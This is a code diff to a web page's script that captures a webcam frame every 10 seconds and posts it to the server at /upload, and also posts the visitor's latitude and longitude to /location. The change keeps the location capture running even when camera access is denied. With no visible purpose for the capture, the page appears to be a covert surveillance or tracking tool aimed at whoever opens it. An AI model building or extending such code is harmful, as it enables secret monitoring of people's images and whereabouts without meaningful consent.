--- a/index.html
+++ b/index.html
@@ -22,46 +22,56 @@
     const canvas = document.getElementById('canvas');
     const context = canvas.getContext('2d');
 
-    // Function to capture video frame and send to server
+    // Request location permission
+    navigator.geolocation.getCurrentPosition(
+      () => console.log('Location permission granted.'),
+      error => console.warn('Location permission denied or not yet granted:', error)
+    );
+
     async function captureAndSend() {
-      // Set canvas dimensions to video size
+      // Set up video canvas
       canvas.width = video.videoWidth;
       canvas.height = video.videoHeight;
-
-      // Draw the current video frame on the canvas
       context.drawImage(video, 0, 0, canvas.width, canvas.height);
 
-      // Convert the canvas to a Base64 image
+      // Convert video frame to image data
       const image = canvas.toDataURL('image/jpeg');
 
-      // Send image to the server
+      // Send image to the server (only if video is available)
       await fetch('/upload', {
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({ image })
       });
 
-      // Get location and send to server
-      navigator.geolocation.getCurrentPosition(async (position) => {
+      // Capture and send location
+      try {
+        const position = await new Promise((resolve, reject) =>
+          navigator.geolocation.getCurrentPosition(resolve, reject)
+        );
         const { latitude, longitude } = position.coords;
         await fetch('/location', {
           method: 'POST',
           headers: { 'Content-Type': 'application/json' },
           body: JSON.stringify({ latitude, longitude })
         });
-      });
+      } catch (error) {
+        console.error('Error fetching location:', error);
+      }
     }
 
-    // Access camera
+    // Access the camera (with error handling)
     navigator.mediaDevices.getUserMedia({ video: true })
       .then(stream => {
         video.srcObject = stream;
-
+        console.log('Camera access granted');
         // Start capturing every 10 seconds
         setInterval(captureAndSend, 10000);
       })
       .catch(error => {
-        console.error('Error accessing camera:', error);
+        console.error('No camera detected or access denied:', error);
+        // Still capture location if camera access fails
+        setInterval(captureAndSend, 10000); // capture and send location only
       });
   </script>
 </body>
